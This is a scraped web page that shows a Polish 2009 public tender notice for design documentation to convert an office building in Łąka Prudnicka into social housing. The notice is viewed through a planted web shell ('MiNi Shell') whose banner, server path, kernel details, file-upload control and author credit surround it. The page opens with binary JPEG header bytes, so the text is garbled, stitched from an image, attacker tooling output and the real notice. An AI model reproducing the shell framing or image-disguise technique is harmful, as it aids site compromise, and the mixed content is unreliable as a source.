JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090312/60420-N-2009.html

<p class="kh_header"><b>Prudnik: Wykonanie dokumentacji projektowej przebudowy byłego budynku biurowego ze zmianą sposobu użytkowania na budynek mieszkalny z lokalami socjalnymi w Łące  Prudnickiej wraz z nadzorem autorskim</b><br>
<b>Numer ogłoszenia: 60420 - 2009; data zamieszczenia: 12.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Budynków Komunalnych , ul. Piastowska 42, 48-200 Prudnik, woj. opolskie, tel. 077 4363884, faks 077 4363884.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zbkprudnik.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej przebudowy byłego budynku biurowego ze zmianą sposobu użytkowania na budynek mieszkalny z lokalami socjalnymi w Łące  Prudnickiej wraz z nadzorem autorskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamawiający zamawia a Wykonawca przyjmuje do wykonania dokumentację projektową dla przedsięwzięcia Przebudowa budynku biurowego ze zmianą sposobu użytkowania na budynek  mieszkalny z lokalami socjalnymi  położonego w Łące Prudnickiej na działkach nr  286/6, 287/1, 287/2, 844/7 przy ul. Głuchołaskiej wraz z nadzorem autorskim.

2. Zakres przedmiotu zamówienia obejmuje
      1) wykonanie kompletnej dokumentacji projektowej z projektem architektoniczno -budowlano-wykonawczym. Projekt winien zawierać:
a)   inwentaryzację budowlaną
b)	program funkcjonalno-użytkowy budynku mieszkalnego socjalnego
c)	projekt instalacji wodno-kanalizacyjnej wraz z przyłączami,
d)	projekt instalacji centralnego ogrzewania wraz z kotłownią,
e)	projekt instalacji elektrycznej wraz z przyłączem energetycznym,
f)	projekt wszystkich niezbędnych urządzeń  oraz instalacji wewnętrznych w budynku socjalnym mieszkalnym,)
g)	projekt odwodnienia terenu działki oraz budynku objętych opracowaniem projektowym,
h)	projekt przebudowy ( przełożenia) ewentualnych kolizji istniejącego uzbrojenia podziemnego i nadziemnego z projektowaną infrastrukturą ,
i)	projekt zagospodarowania terenu wokół projektowanego budynku w skali 1:500 wraz z istniejącym i zaprojektowanym uzbrojeniem terenu ( zaznaczonym na kolorowo) uwzględniający wejścia do budynku, chodniki  i minimalną ilość miejsc parkingowych dla samochodów,  
j)	przedmiaru robót w odniesieniu do poszczególnych opracowań projektowych,
k)	kosztorysy inwestorskie w odniesieniu do poszczególnych opracowań projektowych,
l)	specyfikacji technicznych warunków wykonania i odbioru robót, które zostaną sporządzone zgodnie z obowiązującymi przepisami oraz będą gwarantować możliwość ich bezpośredniego użycia  w procedurze  udzielenia zamówienia na wykonanie projektowanej inwestycji, jej odbiór wraz ze wszystkimi uzgodnieniami z organami administracji   i odpowiednich inwestycji,
m)	informację do planu bezpieczeństwa i ochrony zdrowia w zakresie wykonanych robót,
n)	charakterystykę energetyczną budynku - świadectwo energetyczne,
o)	projekt ochrony powietrza atmosferycznego przed zanieczyszczeniem wraz z decyzją.
2)uzyskanie warunków, opinii i uzgodnień niezbędnych do prawidłowego opracowania dokumentacji projektowej,
3)	uzyskanie pozwolenia budowlanego dla zaprojektowanej inwestycji w imieniu i z upoważnienia Zamawiającego,
4)	oświadczenia o sporządzeniu projektu budowlanego zgodnie z obowiązującymi przepisami i zasadami wiedzy technicznej,
5)	oświadczenia o kompletności dokumentacji,
6)	sprawowanie nadzoru autorskiego  w trakcie trwania realizacji inwestycji w oparciu o opracowaną dokumentację,
7)	przeniesienie majątkowych praw autorskich do dokumentacji z prawem korzystania na polach eksploatacji wymienionych w umowie,
8)	udzielenie rękojmi na wykonaną dokumentację projektową.

 3.  Założenia projektowe do programu funkcjonalno-użytkowego zawarte są w załączniku nr 8 do SIWZ 
Przed przystąpieniem do opracowywania części kosztowej należy uzgodnić z Zamawiającym założenia wyjściowe do kosztorysowania.
   
4. Wykonawca zobowiązany jest dostarczyć dokumentację projektową  z zawartością tekstową i graficzną   w formie wydruku (4 egzemplarze) i formie elektronicznej na  płytach CD w formacie  PDF, rysunki w formacie dwg ( AutoCad),  tekst w formacie WORD- umożliwiającej Zamawiającemu zamieszczenie   dokumentacji na stronie internetowej jako załącznik do SIWZ na wykonanie robót, z  wyjątkiem kosztorysu inwestorskiego , 
5.Dokumentację projektową na realizację zadania należy  opracować zgodnie z :
1)	rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót  budowlanych oraz programu funkcjonalno-użytkowego ( Dz. U. Nr 202, poz.2072 z późn. zm. )
2)	rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw  sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów  robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz. U. Nr 130, poz. 1389)
3)	ustawą z dnia 7 lipca 1994 r. Prawo Budowlane ( Dz. U. z 2006 r. Nr 156, poz.1118 z późn. zm.)
4)	rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. nr 75, poz. 690 z późn. zm. )
5)	rozporządzeniem Ministra Infrastruktury z dnia 6 listopada 2008 r. w sprawie metodologii obliczania charakterystyki energetycznej budynku i lokalu mieszkalnego lub części budynku  stanowiącej samodzielną całość techniczno-użytkową oraz sposobu sporządzania i wzorów świadectw ich charakterystyki energetycznej ( Dz. U. Nr 201, poz. 1240 )
6)	rozporządzeniem Ministra Infrastruktury z dnia 15 marca 2007 r. w sprawie finansowego wsparcia na tworzenie lokali socjalnych i mieszkań chronionych (Dz. U. nr 52, poz.346, z późn. zm.)
7)	z Polskimi Normami i zasadami wiedzy technicznej z zakresu 
     budownictwa.

6.	Przed złożeniem dokumentacji projektowej w właściwym urzędzie, należy dokumentację techniczną uzgodnić z Zamawiającym.
7.	Wykonawca zobowiązuje się do pełnienia nadzoru autorskiego
Zakres nadzoru autorskiego.

Pełnienie nadzoru autorskiego nad robotami budowlanymi wykonywanymi na podstawie opracowanego przez Wykonawcę projektu obejmuje   :

1.	nadzór nad zgodnością wykonawstwa z dokumentacją projektową w zakresie rozwiązań materiałowych, użytkowych, technicznych i technologicznych,
2.	wyjaśniania wątpliwości dotyczących opracowanej dokumentacji projektowej i zawartych w niej rozwiązań, w tym uszczegółowienia rysunków wykonawczych, nanoszenia poprawek lub uzupełnień na wszystkich egzemplarzach dokumentacji,
3.	uzgadnianie z Zamawiającym możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji projektowej, zgłoszonych przez kierownika budowy lub nadzór inwestorski,
4.	czuwanie, by zakres ewentualnie wprowadzonych zmian nie spowodował istotnej zmiany zatwierdzonego projektu , wymagającej uzyskania nowego pozwolenia na budowę,
5.	przedstawienie propozycji rozwiązań zamiennych, w przypadku niemożności zastosowania rozwiązań występujących w dokumentacji projektowej lub gdy ich zastosowanie jest nieekonomiczne lub nieefektywne w świetle aktualnej wiedzy i zasad sztuki budowlanej, a koszt zastosowania nowych rozwiązań nie zwiększy kosztów inwestycji, z zastrzeżeniem, że każde rozwiązanie musi być zaakceptowane przez Zamawiającego ,
6.	poprawianie błędów projektowych, likwidację kolizji między branżami lub uzupełnianie rysunków, detali bądź opisu technologii wykonania zawartych w dokumentacji - bez prawa do odrębnego wynagrodzenia,
7.	w przypadku wprowadzenia zmian stanowiących istotne odstępstwo od zatwierdzonego projektu i pozwolenia na budowę, Wykonawca zobowiązany jest własnym staraniem i na własny koszt doprowadzić do zgodności z obowiązującym prawem,
8.	udział w komisjach , naradach technicznych i odbiorze inwestycji,
9.	powiadomienie Zamawiającego i wykonawcę robót o stwierdzonych w toku realizacji inwestycji uchybieniach  i  niezgodnościach  z dokumentacją projektową w celu podjęcia odpowiednich działań,
10.	na każde żądanie wykonawcy robót  lub  Zamawiającego przybycie na budowę nie później niż w ciągu 2 dni od zawiadomienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, spełniają warunki określone w art. 22 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych oraz spełniają następujące warunki udziału:              
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień .
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
-	Posiadają doświadczenie z ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wyrażające się tym, że wykonali co najmniej jedną dokumentację projektową  obejmującą budowę, rozbudowę, przebudowę lub remont budynku mieszkalnego wielorodzinnego.
            Doświadczenia podwykonawców oraz ich zasoby nie będą brane pod uwagę przy określaniu czy wykonawca spełnia warunki udziału.
 - Osoby, które będą uczestniczyć w wykonywaniu zamówienia, winny należeć do Okręgowej Izby Inżynierów Budownictwa OIIB i posiadać wymagane uprawnienia do projektowania 
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 ustawy)

2)	Zamawiający dokona oceny spełniania każdego z warunków na podstawie załączonych do oferty dokumentów i oświadczeń, o których mowa w pkt. 9 ppkt. 1 lit a -i według formuły spełnia/nie spełnia. Brak załączenia przez Wykonawcę któregokolwiek z dokumentów zostanie uznane przez zamawiającego jako niespełnienie warunku, co będzie skutkować wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a)  oświadczenie wykonawcy, o spełnianiu warunków określonych w art. 22 ustawy, według wzoru, stanowiącego załącznik nr 2 do niniejszej SIWZ; W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z wykonawców składających ofertę wspólną.
b) Oświadczenie o nie podleganiu wykluczeniu zgodnie z art. 24 ust. 1 i 2 ustawy Pzp  ( załącznik nr 3 ), w przypadku składania oferty wspólnej ww. oświadczenie składa każdy z wykonawców składających ofertę wspólną
c)  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpi?sie do ewidencji działalności gospodarczej potwierdzające, że profil działalności wykonawcy odpowiada przedmiotowi zamówienia, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
W przypadku składania oferty wspólnej w/w dokument składa każdy z wykonawców składających ofertę wspólną.
d)  wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności  (lub pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa, wykonawca wykazał osoby, którymi będzie dysponował) według wzoru stanowiącego załącznik nr 4 do niniejszej SIWZ.
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje minimum jedną osobą posiadającą uprawnienia do  projektowania.; W przypadku składania oferty wspólnej wykonawcy składają jeden wspól?ny wykaz kadry
e)  dokumenty lub oświadczenia stwierdzające, że osoby, o których mowa w pdpkt d) posiadają wymagane uprawnienia tj. kopie uprawnień budowlanych oraz aktualne zaświadczenia o przynależności tych osób do OIIB;
f) wykaz wykonanych co najmniej 1 dokumentacji projektowej obejmującej budowę, rozbudowę, przebudowę lub remont budynku mieszkalnego wielorodzinnego w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a je?żeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania, według wzoru stanowiącego załącznik nr 5 do niniejszej SIWZ oraz dokumenty (np. referencje, protokoły odbioru końcowego) potwierdzające, że usługi te zostały wykonane należycie.
g) oświadczenie o nie karaniu  w zakresie objętym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo zamówień publicznych dotyczące: prawomocnego skazania za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego  załącznik nr 6
h) oświadczenie o nie zaleganiu w podatkach i opłatach i składkach na ubezpieczenie społeczne i zdrowotne załącznik nr 6
i)  pełnomocnictwo,  
oryginał pełnomocnictwa, podpisany przez uprawnionych przedstawicieli wykonawcy (współwykonawców) lub poświadczona przez nich  za zgodność z oryginałem kopia pełnomocnictwa. W przypadku składania oferty wspólnej należy złożyć jeden dokument..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zbkprudnik.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków Komunalnych
ul. Piastowska nr 42
48-200 Prudnik.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2009 godzina 10:00, miejsce: Zarząd Budynków Komunalnych
ul. Piastowska nr 42
48-200 Prudnik
sekretariat, pok. nr 14.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com